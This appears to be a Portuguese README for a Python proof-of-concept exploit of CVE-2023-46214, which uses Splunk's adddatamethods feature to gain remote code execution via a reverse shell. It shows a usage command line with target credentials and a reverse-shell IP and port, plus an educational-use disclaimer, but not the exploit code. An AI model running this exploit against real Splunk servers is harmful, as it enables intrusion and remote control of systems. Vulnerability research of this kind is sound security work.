
PoC baseado em Python para CVE-2023-46214 que explora o recurso adddatamethods do Splunk para alcançar execução remota de código por meio de uma reverse shell.
Prova de conceito de exploit para CVE-2023-46214, SVD-2023-1104

A URL da instância do Splunk, o nome de usuário, a senha, o IP do shell reverso e a porta são todos obrigatórios como parâmetros de linha de comando. Por exemplo:
$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>
Escrevi um post no blog detalhando a metodologia utilizada para descobrir esta vulnerabilidade. Se você estiver encontrando algum problema com o script, o blog pode ser útil, pois detalha as etapas manuais para a exploração.
Analysis of CVE-2023-46214 + PoC
O script de Prova de Conceito (PoC) fornecido neste repositório serve unicamente para objetivos educacionais e de pesquisa. Seu propósito é demonstrar uma vulnerabilidade específica e auxiliar na compreensão dos riscos de segurança associados.
Qualquer uso deste script para atividades não autorizadas, incluindo, mas não se limitando a acesso não autorizado a sistemas, testes não autorizados ou outras formas de uso indevido, é inequivocamente proibido.
Os criadores e contribuidores deste repositório se isentam de toda responsabilidade pelo uso impróprio ou por qualquer dano ou prejuízo resultante do uso deste script. Ao utilizar este script, você concorda em usá-lo de forma responsável e por sua conta e risco.